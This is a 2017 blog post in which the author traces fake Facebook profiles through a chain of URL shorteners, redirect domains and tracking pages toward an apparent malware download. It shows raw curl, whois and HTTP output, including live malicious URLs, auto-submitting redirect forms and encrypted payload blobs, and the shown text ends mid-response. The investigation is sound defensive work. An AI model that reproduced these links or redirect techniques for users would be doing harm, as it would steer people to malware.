Anatomy of a Malware Injection

Written by dweekly | Published 2017/08/10
Tech Story Tags: spam

TLDRvia the TL;DR App

Today I got a number of pretty questionable “friend requests” from young females on Facebook with zero mutual friends and with very racy profile pics. Of course they were fake, but I was curious to (safely) explore what was at the bottom of the rabbit hole. It was an exciting trip.

The journey touches Facebook, Google, and Amazon along with dozens of other web hosts and registrars, and spans the globe from the US to Indonesia to Germany and elsewhere. It’s a bizarrely elegant integration of touchpoints from a range of technology stacks and services, all conspiring to get a lonely guy eager for a sex massage to accidentally install some software in his browser.

Here’s “Blanca Aline Laine” (made up name)

Above we see the fake profile, since taken down by Facebook. I’m still friends with the fraud team there, which is helpful. Racy images (but not NSFW, like some of the other ones) with profile text indicating she A) lives in my city (Redwood City) and B) can drive to a client’s house and give a “sex massage package for $5.00”. What a good deal, eh?

Most of these fake profiles I saw today have included goo.gl URL shortened links to try and mask the destination, and include this as part of their profile picture caption. I wondered if Facebook automatically alerts Google when it finds goo.gl shortlinks it needs to blackhole.

I dove in on the command line to try and index where this went.

Caution: please do not follow any of these links below in your browser. They are operated by malware vendors and may harm your computer.

First stop was Google (yay!)

$ curl -v -v https://goo.gl/7uvoPS* Trying 172.217.6.78...* TCP_NODELAY set* Connected to goo.gl (172.217.6.78) port 443 (#0)* TLS 1.2 connection using TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256* Server certificate: *.google.com* Server certificate: Google Internet Authority G2* Server certificate: GeoTrust Global CA> GET /7uvoPS HTTP/1.1> Host: goo.gl> User-Agent: curl/7.54.0> Accept: */*>< HTTP/1.1 301 Moved Permanently< Strict-Transport-Security: max-age=63072000; includeSubDomains; preload< Content-Type: text/html; charset=UTF-8< Cache-Control: no-cache, no-store, max-age=0, must-revalidate< Pragma: no-cache< Expires: Mon, 01 Jan 1990 00:00:00 GMT< Date: Thu, 10 Aug 2017 03:47:16 GMT< Location: http://gillian.pucukharum.top/SHM2bkh2N3lZSFRHOEZtVDRoN0VUUT09_95816436.do< X-Content-Type-Options: nosniff< X-Frame-Options: SAMEORIGIN< X-XSS-Protection: 1; mode=block< Server: GSE< Alt-Svc: quic=":443"; ma=2592000; v="39,38,37,35"< Accept-Ranges: none< Vary: Accept-Encoding< Transfer-Encoding: chunked<<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD><BODY BGCOLOR="#FFFFFF" TEXT="#000000"><H1>Moved Permanently</H1>The document has moved <A HREF="http://gillian.pucukharum.top/SHM2bkh2N3lZSFRHOEZtVDRoN0VUUT09_95816436.do">here</A>.</BODY></HTML>

Simple 301 permanent redirect (note the QUIC advertisement!). Redirect is to a .top TLD — wait, what? I don’t think I’ve ever seen a legit .top website. Yep, check Spam Haus — .top is a “top 10” spam TLD. .top indeed! The TLD operated by the prestigious “jiangsu bangning science and technology company”. [sigh] Okay, I wonder who owns the domain.

$ whois pucukharum.topDomain Name: pucukharum.topRegistry Domain ID: D20170405G10001G_05028476-TOPRegistrar WHOIS Server: whois.namecheap.comRegistrar URL: https://www.namecheap.com/Updated Date: 2017-04-05T05:36:50ZCreation Date: 2017-04-05T05:36:23ZRegistry Expiry Date: 2018-04-05T05:36:23ZRegistrar: Namecheap Inc.Registrar IANA ID: 1068Registrar Abuse Contact Email: abuse@namecheap.comRegistrar Abuse Contact Phone: +1.6613102107Domain Status: clientTransferProhibited https://www.icann.org/epp#clientTransferProhibitedRegistry Registrant ID: bd76px9aqmn8dhijRegistrant Name: WhoisGuard ProtectedRegistrant Organization: WhoisGuard, Inc.Registrant Street: P.O. Box 0823-03411Registrant City: PanamaRegistrant State/Province: PanamaRegistrant Postal Code: 0Registrant Country: PARegistrant Phone: +507.8365503Registrant Phone Ext:Registrant Fax: +51.17057182Registrant Fax Ext:Registrant Email: fbf6f8770e9f42d3bac4e0f0740d12f2.protect@whoisguard.comRegistry Admin ID: 47ukg1inpzur0sypAdmin Name: WhoisGuard ProtectedAdmin Organization: WhoisGuard, Inc.Admin Street: P.O. Box 0823-03411Admin City: PanamaAdmin State/Province: PanamaAdmin Postal Code: 0Admin Country: PAAdmin Phone: +507.8365503Admin Phone Ext:Admin Fax: +51.17057182Admin Fax Ext:Admin Email: fbf6f8770e9f42d3bac4e0f0740d12f2.protect@whoisguard.comRegistry Tech ID: 6wpuqoght8t1dv3pTech Name: WhoisGuard ProtectedTech Organization: WhoisGuard, Inc.Tech Street: P.O. Box 0823-03411Tech City: PanamaTech State/Province: PanamaTech Postal Code: 0Tech Country: PATech Phone: +507.8365503Tech Phone Ext:Tech Fax: +51.17057182Tech Fax Ext:Tech Email: fbf6f8770e9f42d3bac4e0f0740d12f2.protect@whoisguard.comName Server: dns1.registrar-servers.comName Server: dns2.registrar-servers.comDNSSEC: unsignedURL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/>>> Last update of WHOIS database: 2017-08-10T04:13:29Z <<<

For more information on Whois status codes, please visit https://icann.org/epp

NOTICE: The expiration date displayed in this record is the date theregistrar's sponsorship of the domain name registration in the registry iscurrently set to expire. This date does not necessarily reflect the expirationdate of the domain name registrant's agreement with the sponsoringregistrar. Users may consult the sponsoring registrar's Whois database toview the registrar's reported date of expiration for this registration.

TERMS OF USE: The information in the Whois database is collected through ICANN-accredited registrars. Jiangsu bangning science & technology Co., Ltd(“BANGNING”) make this information available to you and do not guarantee its accuracy or completeness. By submitting a whois query, you agree to abide by the following terms of use: you agree that you may use this data only for lawful purposes and that under no circumstances will you use this data to: (1) to allow, enable, or otherwise support the transmission of mass unsolicited, commercial advertising or solicitations via direct mail, electronic mail, or by telephone; (2) in contravention of any applicable data and privacy protection acts; or (3) to enable high volume, automated, electronic processes that apply to BANGNING (or its computer systems). Compilation, repackaging, dissemination, or other use of the WHOIS database in its entirety, or of a substantial portion thereof, is not allowed without BANGNING prior written permission. You agree not to use electronic processes that are automated and high-volume to access or query the whois database except as reasonably necessary to register domain names or modify existing registrations. BANGNING reserves the right to restrict your access to the whois database in its sole discretion to ensure operational stability. BANGNING may restrict or terminate your access to the whois database for failure to abide by these terms of use. BANGNING reserves the right to modify these terms at any time without prior or subsequent notification of any kind.

Ah, it’s a NameCheap registered domain and protected by WhoisGuard. And the site main page insists it’s “down for maintenance”. Mmhmm…

$ host gillian.pucukharum.topgillian.pucukharum.top has address 138.197.209.244$ whois 138.197.209.244...NetRange: 138.197.0.0 - 138.197.255.255CIDR: 138.197.0.0/16NetName: DIGITALOCEAN-16

Here’s the holding page:

$ curl -v -v http://gillian.pucukharum.top/SHM2bkh2N3lZSFRHOEZtVDRoN0VUUT09_95816436.do* Trying 138.197.209.244...* TCP_NODELAY set* Connected to gillian.pucukharum.top (138.197.209.244) port 80 (#0)> GET /SHM2bkh2N3lZSFRHOEZtVDRoN0VUUT09_95816436.do HTTP/1.1> Host: gillian.pucukharum.top> User-Agent: curl/7.54.0> Accept: */*>< HTTP/1.1 200 OK< Server: nginx/1.10.1 (Ubuntu)< Date: Thu, 10 Aug 2017 03:47:54 GMT< Content-Type: text/html; charset=UTF-8< Transfer-Encoding: chunked< Connection: keep-alive<

<head><meta name="referrer" content="never"><noscript><META http-equiv="refresh" content="0;URL=ngapax.php?user=SHM2bkh2N3lZSFRHOEZtVDRoN0VUUT09&grup=UkwwRktNQ2IzK2Y5Tk5rRko2VDI5UT09"></noscript></head><script>window.opener = null; location.replace("ngapax.php?user=SHM2bkh2N3lZSFRHOEZtVDRoN0VUUT09&grup=UkwwRktNQ2IzK2Y5Tk5rRko2VDI5UT09")</script>

Here’s a 200 page returned from a .do file (usually Java web struts)…but only with a meta refresh to a PHP script on the same domain, on a machine hosted by DigitalOcean. Odd. Okayyyy…

$ curl -v -v "http://gillian.pucukharum.top/ngapax.php?user=SHM2bkh2N3lZSFRHOEZtVDRoN0VUUT09&grup=UkwwRktNQ2IzK2Y5Tk5rRko2VDI5UT09"* Trying 138.197.209.244...* TCP_NODELAY set* Connected to gillian.pucukharum.top (138.197.209.244) port 80 (#0)> GET /ngapax.php?user=SHM2bkh2N3lZSFRHOEZtVDRoN0VUUT09&grup=UkwwRktNQ2IzK2Y5Tk5rRko2VDI5UT09 HTTP/1.1> Host: gillian.pucukharum.top> User-Agent: curl/7.54.0> Accept: */*>< HTTP/1.1 302 Found< Server: nginx/1.10.1 (Ubuntu)< Date: Thu, 10 Aug 2017 03:49:16 GMT< Content-Type: text/html; charset=UTF-8< Transfer-Encoding: chunked< Connection: keep-alive< Location: http://digitalz.review/ngapax.php?user=SHM2bkh2N3lZSFRHOEZtVDRoN0VUUT09&grup=UkwwRktNQ2IzK2Y5Tk5rRko2VDI5UT09

Okay…another weird TLD here. With another NameCheap WhoisGuard domain. Hosted by DigitalOcean. With the same“Down for Maintenance” page on both the domain and IP. Oddly familiar...

$ curl -v -v "http://digitalz.review/ngapax.php?user=SHM2bkh2N3lZSFRHOEZtVDRoN0VUUT09&grup=UkwwRktNQ2IzK2Y5Tk5rRko2VDI5UT09"* Trying 138.197.207.100...* TCP_NODELAY set* Connected to digitalz.review (138.197.207.100) port 80 (#0)> GET /ngapax.php?user=SHM2bkh2N3lZSFRHOEZtVDRoN0VUUT09&grup=UkwwRktNQ2IzK2Y5Tk5rRko2VDI5UT09 HTTP/1.1> Host: digitalz.review> User-Agent: curl/7.54.0> Accept: */*>< HTTP/1.1 200 OK< Server: nginx/1.10.3 (Ubuntu)< Date: Thu, 10 Aug 2017 03:49:29 GMT< Content-Type: text/html; charset=UTF-8< Transfer-Encoding: chunked< Connection: keep-alive<

<!DOCTYPE html><html lang="en"><head><title> Please Wait...</title><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="robots" content="noindex, nofollow">

<noscript> <style>html{display:none;}</style><meta http-equiv="refresh" content="0;http://ssl-cd.com/?a=47752&c=90645&s1=&s2=NGAPAX&s3=MASTERMIND&s4=&s5=mastermind1502336969"></noscript>

<script type = "text/javascript">window.setTimeout("autoClick()", 500); // 10 seconds delayfunction autoClick() {var linkPage = document.getElementById("dynLink").href;window.location.href = linkPage;}</script></head><Body>

<img src="http://169.55.150.194/track.php?a=NGAPAX&b=MASTERMIND&c=&d=24.5.178.157&e=desktop&f=&g=unknown&h=mastermind1502336969"><a href="http://ssl-cd.com/?a=47752&c=90645&s1=&s2=NGAPAX&s3=MASTERMIND&s4=&s5=mastermind1502336969 " id="dynLink"></a>

      </Body>  
    </html>

Here we’ve got a meta-refresh to yet another domain, with a charming tracker script & image (“CLick Factory@The Genz”) hosted by SoftLayer and operated by Indonesians(?!), returning a 1x1 JPG (why not .GIF?) created by gd-jpeg.

Looks like this domain is registered by key-systems.net (German) and has DNS service provided by AWS.

$ whois ssl-cd.comDomain Name: SSL-CD.COMRegistry Domain ID: 2068776467_DOMAIN_COM-VRSNRegistrar WHOIS Server: whois.rrpproxy.netRegistrar URL: http://www.key-systems.netUpdated Date: 2016-12-13T09:18:01ZCreation Date: 2016-10-25T10:04:13ZRegistry Expiry Date: 2017-10-25T10:04:13ZRegistrar: Key-Systems GmbHRegistrar IANA ID: 269Registrar Abuse Contact Email: abuse@key-systems.netRegistrar Abuse Contact Phone: +49.68949396850Domain Status: ok https://icann.org/epp#okName Server: NS-1151.AWSDNS-15.ORGName Server: NS-1875.AWSDNS-42.CO.UKName Server: NS-24.AWSDNS-03.COMName Server: NS-777.AWSDNS-33.NETDNSSEC: unsignedURL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/>>> Last update of whois database: 2017-08-10T04:55:21Z <<<

And sure enough, the site itself is hosted on AWS as well.

$ host ssl-cd.comssl-cd.com has address 52.202.232.0ssl-cd.com has address 54.174.134.18$ whois 52.202.232.0...NetRange: 52.192.0.0 - 52.223.255.255CIDR: 52.192.0.0/11NetName: AT-88-ZNetHandle: NET-52-192-0-0-1Parent: NET52 (NET-52-0-0-0-0)NetType: Direct AllocationOriginAS:Organization: Amazon Technologies Inc. (AT-88-Z)RegDate: 2015-09-02Updated: 2015-09-02Ref: https://whois.arin.net/rest/net/NET-52-192-0-0-1

And here’s a 302 to cdprivate.com…

$ curl -v -v "http://ssl-cd.com/?a=47752&c=90645&s1=&s2=NGAPAX&s3=MASTERMIND&s4=&s5=mastermind1502336969"* Trying 52.202.232.0...* TCP_NODELAY set* Connected to ssl-cd.com (52.202.232.0) port 80 (#0)> GET /?a=47752&c=90645&s1=&s2=NGAPAX&s3=MASTERMIND&s4=&s5=mastermind1502336969 HTTP/1.1> Host: ssl-cd.com> User-Agent: curl/7.54.0> Accept: */*>< HTTP/1.1 302 Found< Cache-Control: private< Content-Type: text/html; charset=utf-8< Location: http://cdprivate.com/?a=47752&c=90645&s1=&s2=NGAPAX&s3=MASTERMIND&s4=&s5=mastermind1502336969&ckmguid=99274524-c7b2-409c-bdae-227123f22acb< Date: Thu, 10 Aug 2017 03:50:48 GMT< Content-Length: 283<<html><head><title>Object moved</title></head><body><h2>Object moved to <a href="http://cdprivate.com/?a=47752&c=90645&s1=&s2=NGAPAX&s3=MASTERMIND&s4=&s5=mastermind1502336969&ckmguid=99274524-c7b2-409c-bdae-227123f22acb">here</a>.</h2></body></html>

Also registered by key-systems.net and hosted on AWS with Route53 DNS.

$ host cdprivate.comcdprivate.com has address 52.202.232.0cdprivate.com has address 54.174.134.18

And the same set of IPs. odd. Wonder why they need the extra redirect and domain…?

$ curl -v -v "http://cdprivate.com/?a=47752&c=90645&s1=&s2=NGAPAX&s3=MASTERMIND&s4=&s5=mastermind1502336969&ckmguid=99274524-c7b2-409c-bdae-227123f22acb"* Trying 52.202.232.0...* TCP_NODELAY set* Connected to cdprivate.com (52.202.232.0) port 80 (#0)> GET /?a=47752&c=90645&s1=&s2=NGAPAX&s3=MASTERMIND&s4=&s5=mastermind1502336969&ckmguid=99274524-c7b2-409c-bdae-227123f22acb HTTP/1.1> Host: cdprivate.com> User-Agent: curl/7.54.0> Accept: */*>< HTTP/1.1 302 Found< Cache-Control: private< Content-Type: text/html; charset=utf-8< Location: http://varm.2587812.com/?kw={kw}&s1=-1&s2=6342103249< p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"< Set-Cookie: sfd=gYcMLbT3p2Qq4qjzNWkj3GBapgYL+C9YYKjchnfxHwPf4An8Fwbg3Q==; domain=.cdprivate.com; path=/; HttpOnly< Set-Cookie: tib=Sq1clb2N/nFPTQFRAWNbtWBapgYL+C9YYKjchnfxHwPf4An8Fwbg3Q==; domain=.cdprivate.com; expires=Wed, 10-Aug-2022 03:51:44 GMT; path=/; HttpOnly< Date: Thu, 10 Aug 2017 03:51:43 GMT< Content-Length: 177<<html><head><title>Object moved</title></head><body><h2>Object moved to <a href="http://varm.2587812.com/?kw={kw}&s1=-1&s2=6342103249">here</a>.</h2></body></html>

Here’s another 302, this time to a UniRegistrar-registered throwaway domain (2587812.com), hosted at Linode (a VPS provider).

$ host varm.2587812.comvarm.2587812.com has address 45.79.165.120$ whois 45.79.165.120...NetRange: 45.79.0.0 - 45.79.255.255CIDR: 45.79.0.0/16NetName: LINODE-USNetHandle: NET-45-79-0-0-1Parent: NET45 (NET-45-0-0-0-0)NetType: Direct AllocationOriginAS: AS3595, AS21844, AS8001, AS6939Organization: Linode (LINOD)RegDate: 2015-04-29Updated: 2015-04-29Comment: Linode, LLCComment: http://www.linode.comRef: https://whois.arin.net/rest/net/NET-45-79-0-0-1

And now…

$ curl -v -v "http://varm.2587812.com/?kw={kw}&s1=-1&s2=6342103249"* Trying 45.79.165.120...* TCP_NODELAY set* Connected to varm.2587812.com (45.79.165.120) port 80 (#0)> GET /?kw=kw&s1=-1&s2=6342103249 HTTP/1.1> Host: varm.2587812.com> User-Agent: curl/7.54.0> Accept: */*>< HTTP/1.1 200 OK< Server: openresty/1.11.2.2< Date: Thu, 10 Aug 2017 03:52:22 GMT< Content-Type: text/html; charset=UTF-8< Transfer-Encoding: chunked< X-Powered-By: PHP/7.0.11< X-ImpID: 5057a1bc-7d7f-11e7-b7cd-fa245441bcee<<!DOCTYPE html><head><noscript><meta http-equiv="refresh" content="0; url=http://NrRzz.alldownloads.hapc.gdn/?sov=627219294&hid=dtfptlrhfvpd&amp%3Bs1=-1&amp%3Bs2=6342103249&pid=1597&redid=7988&gsid=68&campaign_id=42&p_id=1597&id=XNSX.-r7988-t68&impid=5057a1bc-7d7f-11e7-b7cd-fa245441bcee&js_enabled=0&init_ev=1"></noscript></head><body><form id="rform" action="http://NrRzz.alldownloads.hapc.gdn/?sov=627219294&hid=dtfptlrhfvpd&amp%3Bs1=-1&amp%3Bs2=6342103249&pid=1597&redid=7988&gsid=68&campaign_id=42&p_id=1597&id=XNSX.-r7988-t68&impid=5057a1bc-7d7f-11e7-b7cd-fa245441bcee" method="POST"><input type="hidden" name="payload" value="3486ca7f7cc2fa8e5c3f9a538dc2e4b2d333e39509532cb91bb778a403fc7e42f24bd7fa386c1d94eff3ec035b9d47b26e813e3cfdc27969913304f68a752b078cd33970458de7e805d6db86ed59db40548054256736e93e3935d334cd3350a23e05529a3034f3753097faf68b88b621901531e249e1ad76c7c03edba435b3ec1ad17347af85c8dc0027febb853300ee38ff4fdf7b634110b3484484828730dccc8a40dcbd339e83eb8e892b20d113bcf4198076ada77b70ab50ce4463ac38f2828f14276a2424ae67fd121299cc8796c872ea3d2e402bf3c9e9c883de8c1fc79cdf2aa5265d01dc2c9a62ed64375249bb035e57e12b2c895020f796c5979e177b6371565125ac7708522d0cee71b0801398a77ac0bafd2f467a105a03d00e7885ef953b8956d394b6a491361947278a6e83090ca1b212a5f8740c01f16a183265579674c37ba11896617fa97fb79d91432c92815cb6b38fcf1b5febdb037dd19587c532d0f65c2f466620f69d1aa6ecf08374fc4b110038a61460af7caaf0835f2c005fa35c82c56db337ac8dcdbe74cd24b86d5d31fee7d3b22c37dc73ca19b67f19553f48c6af38bd32724c3c672f6b05c80d2bce32401dac229533587f6f0573100c8e003397cb9d68dbade764a405c433a89d109c824a1ecaee60b001d10309e462a94e07a8787337e4a0f41a1f66f752e58de93bbefa444eba6cf7a09081b0d58c07d8fb7bf67b899672b9e2284a73b741e9e48642fe344c9dbe69076ec8364ccf5d33ba5b68c12149c4312ea4351463ad679266e98c43e5d9f625d50e9705047e8188e050b59b9086ebd23c93699b51bc4d731c1520f258b8552cb62933bd8765bbe600c1423c7cb8b30316ff4413c54dfe70965098a93a72353bb9f1ab48f87694b549e8603eafbc793957967c04016e018859413094d7b2ad8c5d170d11f64996e19c40b97be98064f29db0a7244a83a6376b4226809458e1973831182b134249612a1d0ff6ef2eb53f2366d71980c2b1a55bdf"><input type="hidden" name="js_enabled" value="1"><input type="hidden" name="init_ev" value="1"><input type="hidden" name="iv" value="b25020d0634d8814b3c70f55cd586614"></form><script type="text/javascript">document.getElementById('rform').submit();</script></body></html>

And here we get a fascinating auto-POST of a form with a fairly lengthy payload — or a simple meta refresh for folks without JS enabled. To a .GDN TLD, which I had also never heard of. Guess where .GDN ranks in SpamHaus’s “Top 10” spam TLDs? It’s #1. You’ve never heard of a legit .GDN site for a reason, kids. The registry is run by a Dubai-based corp and Epik domains seems to have registered this particular “hapc.gdn” domain.

This fine, upstanding website is hosted by VULTR, a VPS host. VULTR is in a subset of IPs owned by Choopa in New Jersey.

$ host NrRzz.alldownloads.hapc.gdnNrRzz.alldownloads.hapc.gdn has address 45.76.0.183$ whois 45.76.0.183...Vultr Holdings, LLC NET-45-76-0-0-23 (NET-45-76-0-0-2) 45.76.0.0 - 45.76.1.255

Let’s see what’s in store for us!

$ curl -v -v "http://NrRzz.alldownloads.hapc.gdn/?sov=627219294&hid=dtfptlrhfvpd&amp%3Bs1=-1&amp%3Bs2=6342103249&pid=1597&redid=7988&gsid=68&campaign_id=42&p_id=1597&id=XNSX.-r7988-t68&impid=5057a1bc-7d7f-11e7-b7cd-fa245441bcee&js_enabled=0&init_ev=1"* Trying 45.76.0.183...* TCP_NODELAY set* Connected to NrRzz.alldownloads.hapc.gdn (45.76.0.183) port 80 (#0)> GET /?sov=627219294&hid=dtfptlrhfvpd&amp%3Bs1=-1&amp%3Bs2=6342103249&pid=1597&redid=7988&gsid=68&campaign_id=42&p_id=1597&id=XNSX.-r7988-t68&impid=5057a1bc-7d7f-11e7-b7cd-fa245441bcee&js_enabled=0&init_ev=1 HTTP/1.1> Host: NrRzz.alldownloads.hapc.gdn> User-Agent: curl/7.54.0> Accept: */*>< HTTP/1.1 200 OK< Date: Thu, 10 Aug 2017 03:52:52 GMT< Content-Type: text/html; charset=UTF-8< Transfer-Encoding: chunked< P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"< Set-Cookie: ci_session=yYe%2FP9YjrIzn%2Bu0Z3TyhgIpOyB5NWge%2BFzw0PK%2Bd47rXxePI4e5TJhC%2FDyPaopsu06OsNQuC6nPznci4T6Tn8XP%2Bn4L1gtlUHxkwbyrS41bVJzsj2jMQBxyWPbUPfVzl80gh0ROdwIuz8zgrqVeBwX66iQS55mbDbu909K56xYPm2e0L8mS42AI0gwecPjMzCwCHIvS%2BbLbiu%2FNW5CQjhLulGdnSyvv51cDdzuhxqFtOUQjkCnEnaYzG6iTw1yYSIegSaxvJJ0nerom8paEU7qFHig7TRNg%2F%2FZNanyzC5u0bfnw6SkMAE85MmltKAXjKqeP6ysiuqzNERGfIqbiKVQ%3D%3D; expires=Fri, 11-Aug-2017 03:52:52 GMT; Max-Age=86400; path=/; domain=.NrRzz.alldownloads.hapc.gdn< X-Source: Mini< Set-Cookie: id=XNSX.-r7988-t68; expires=Fri, 11-Aug-2017 03:54:32 GMT; Max-Age=86500; path=/; domain=.NrRzz.alldownloads.hapc.gdn< Set-Cookie: SITE_ID=627219294; expires=Fri, 11-Aug-2017 03:54:32 GMT; Max-Age=86500; path=/; domain=.NrRzz.alldownloads.hapc.gdn< Set-Cookie: sov=627219294; expires=Fri, 11-Aug-2017 03:54:32 GMT; Max-Age=86500; path=/; domain=.NrRzz.alldownloads.hapc.gdn< Set-Cookie: tov=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/; domain=.NrRzz.alldownloads.hapc.gdn< Set-Cookie: mov=downloads.mini; expires=Fri, 11-Aug-2017 03:54:32 GMT; Max-Age=86500; path=/; domain=.NrRzz.alldownloads.hapc.gdn< Set-Cookie: redid=7988; expires=Fri, 11-Aug-2017 03:54:32 GMT; Max-Age=86500; path=/; domain=.NrRzz.alldownloads.hapc.gdn< Set-Cookie: campaign_id=42; expires=Fri, 11-Aug-2017 03:54:32 GMT; Max-Age=86500; path=/; domain=.NrRzz.alldownloads.hapc.gdn< Set-Cookie: gsid=68; expires=Fri, 11-Aug-2017 03:54:32 GMT; Max-Age=86500; path=/; domain=.NrRzz.alldownloads.hapc.gdn< Set-Cookie: pid=1597; expires=Fri, 11-Aug-2017 03:54:32 GMT; Max-Age=86500; path=/; domain=.NrRzz.alldownloads.hapc.gdn< Set-Cookie: ref=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/; domain=.NrRzz.alldownloads.hapc.gdn< Set-Cookie: impid=5057a1bc-7d7f-11e7-b7cd-fa245441bcee; expires=Fri, 11-Aug-2017 03:54:32 GMT; Max-Age=86500; path=/; domain=.NrRzz.alldownloads.hapc.gdn< Set-Cookie: URI=sov%3D627219294%26hid%3Ddtfptlrhfvpd%26amp%253Bs1%3D-1%26amp%253Bs2%3D6342103249%26pid%3D1597%26redid%3D7988%26gsid%3D68%26campaign_id%3D42%26p_id%3D1597%26id%3DXNSX.-r7988-t68%26impid%3D5057a1bc-7d7f-11e7-b7cd-fa245441bcee%26js_enabled%3D0%26init_ev%3D1; expires=Fri, 11-Aug-2017 03:54:32 GMT; Max-Age=86500; path=/; domain=.NrRzz.alldownloads.hapc.gdn< Set-Cookie: templateid=3578; expires=Fri, 11-Aug-2017 03:54:32 GMT; Max-Age=86500; path=/; domain=.NrRzz.alldownloads.hapc.gdn< Set-Cookie: path=redirect; expires=Fri, 11-Aug-2017 03:54:32 GMT; Max-Age=86500; path=/; domain=.NrRzz.alldownloads.hapc.gdn< Set-Cookie: version=645649; expires=Fri, 11-Aug-2017 03:54:32 GMT; Max-Age=86500; path=/; domain=.NrRzz.alldownloads.hapc.gdn< Set-Cookie: tags[3578][expand_enable]=-1; expires=Fri, 11-Aug-2017 03:54:32 GMT; Max-Age=86500; path=/; domain=.NrRzz.alldownloads.hapc.gdn< Set-Cookie: tags[3578][alert_enable]=0; expires=Fri, 11-Aug-2017 03:54:32 GMT; Max-Age=86500; path=/; domain=.NrRzz.alldownloads.hapc.gdn< Set-Cookie: tags[3578][audio_enable]=0; expires=Fri, 11-Aug-2017 03:54:32 GMT; Max-Age=86500; path=/; domain=.NrRzz.alldownloads.hapc.gdn< Set-Cookie: tags[3578][pop_enable]=0; expires=Fri, 11-Aug-2017 03:54:32 GMT; Max-Age=86500; path=/; domain=.NrRzz.alldownloads.hapc.gdn< Set-Cookie: tags[645649][expand_enable]=-1; expires=Fri, 11-Aug-2017 03:54:32 GMT; Max-Age=86500; path=/; domain=.NrRzz.alldownloads.hapc.gdn< Set-Cookie: tags[645649][alert_enable]=0; expires=Fri, 11-Aug-2017 03:54:32 GMT; Max-Age=86500; path=/; domain=.NrRzz.alldownloads.hapc.gdn< Set-Cookie: tags[645649][audio_enable]=0; expires=Fri, 11-Aug-2017 03:54:32 GMT; Max-Age=86500; path=/; domain=.NrRzz.alldownloads.hapc.gdn< Set-Cookie: tags[645649][pop_enable]=0; expires=Fri, 11-Aug-2017 03:54:32 GMT; Max-Age=86500; path=/; domain=.NrRzz.alldownloads.hapc.gdn< Set-Cookie: content=645649; expires=Fri, 11-Aug-2017 03:54:32 GMT; Max-Age=86500; path=/; domain=.NrRzz.alldownloads.hapc.gdn< Set-Cookie: token=d206d59098c1efa7a7c18ab1c6060181; expires=Fri, 11-Aug-2017 03:54:32 GMT; Max-Age=86500; path=/; domain=.NrRzz.alldownloads.hapc.gdn< Set-Cookie: rpm=25; expires=Fri, 11-Aug-2017 03:54:32 GMT; Max-Age=86500; path=/; domain=.NrRzz.alldownloads.hapc.gdn< Set-Cookie: vid=444390; expires=Fri, 11-Aug-2017 03:54:32 GMT; Max-Age=86500; path=/; domain=.NrRzz.alldownloads.hapc.gdn< Set-Cookie: log_627219294=1; expires=Fri, 11-Aug-2017 03:54:32 GMT; Max-Age=86500; path=/; domain=.NrRzz.alldownloads.hapc.gdn< Set-Cookie: token=d206d59098c1efa7a7c18ab1c6060181; expires=Fri, 11-Aug-2017 03:54:32 GMT; Max-Age=86500; path=/; domain=.NrRzz.alldownloads.hapc.gdn< Set-Cookie: rpm=25; expires=Fri, 11-Aug-2017 03:54:32 GMT; Max-Age=86500; path=/; domain=.NrRzz.alldownloads.hapc.gdn< Set-Cookie: payload=53d0822880f2f033b7c8b03d5367c29398e09b0abeb88e13a1b80a16d58319c42a6bfea5346e86fa0150c1adaf6ac8787f39fb1b7db0f5700269c0c8b8553335e4526ed7b2e9ec273289f7a0cd92df0b48372ca9f687fb67703bed47633016673df76f5d83ca8e4a29d7e989a600d37133c4db3a65a2fd66f4416ff6285368b59523a3494a4773ab43970ee5b3d3d61cc4d1c82abcdea29a85fc28aceed0d08a42422d4b2df8796450cb26b7a41b49e63cc6032b64c240405cdb7fd5a932a0ea53555507972063b7a0fd87c23278d276bf1c5e2025ba26b6b82d61b9b39a8a70419b589cc723f66030041be8c80aa0b6ed657aef68ef4261aa9d3df3ad1cfe79eccf2f882290dfbbc61b9822e32135122588107018122ac8cea90e8934970fd7c1e60df1f00c4c5b46d5e054605626c1988bb98f64e22b7c769ffa28cfe57d8784f2503c877a28613e563e52a563a09f3faca8955c3798ca613add09359810d3a1a3986d7b51783184d0201e98183618fb4ad1399d4f320570b627678de50e6384ec721a4c8dfef7c31ef128fa67958be65f9612a57475c2efd947557ee1426037b6e560d5150b594eb5b8f369ea3848a51a1754a335bfe923009862228a4ab7f9d9078248034a4a4c73ce9abb77e4461c4369696d4582a940ab63cd625c5872cc5b2fe04d4925c702cee81b0c143bacd1cbfff8ba38b2cf5c9efa2d7b11dbb101013c607e3505abe2102864bf1d236811d8e16fcbe4cb03787a414e71f7dfa3d816540e606ae0d67ee12427a352a623e9a0ceb9ea55e827067572e0be106bf70187af027ce1459de4fb09dab9df1ff4cc8eca4cbd6a38841ed0caeb27bde44cd36233d0fed372eb5d38caad5bb8e34cb3196df35df745ed0634595692fbc94c4c1655f96fb750997b18f0e96cab8a7d60d4e3d6e5f4d972d69cfd77fbc6e53fc5ca74117d0466e77bbd4f378344f2b488beab41679d6d6d76ce6fb8b64f8c9d339e5761aec98daf76c9a222f83bf0e8e2b7a3b1e9c181559c99ddb24e0dac401e020a1f9ae96321b485021244018198742ef483903dc8a67e07421511359a0779d831972a841aca07fc39314c18f169ef043533844ae5f2874e73a3da4ab7707743579b3260d887d1a0b55106bffaee7624c5cb0ce0e2f7911be8a5a053fdf3d6966aca0e2c462244f401a95630e6d0e351e8e6d16b758691cfb2adc538cc394e; expires=Fri, 11-Aug-2017 03:54:32 GMT; Max-Age=86500; path=/; domain=.NrRzz.alldownloads.hapc.gdn< Set-Cookie: payloadIV=7ef9d6fec22596ba73d6ced5f848f6a5; expires=Fri, 11-Aug-2017 03:54:32 GMT; Max-Age=86500; path=/; domain=.NrRzz.alldownloads.hapc.gdn< Set-Cookie: init_ev=0; expires=Fri, 11-Aug-2017 03:54:32 GMT; Max-Age=86500; path=/; domain=.NrRzz.alldownloads.hapc.gdn< Set-Cookie: id=XNSX.-r7988-t68; expires=Fri, 11-Aug-2017 03:54:32 GMT; Max-Age=86500; path=/; domain=.NrRzz.alldownloads.hapc.gdn< 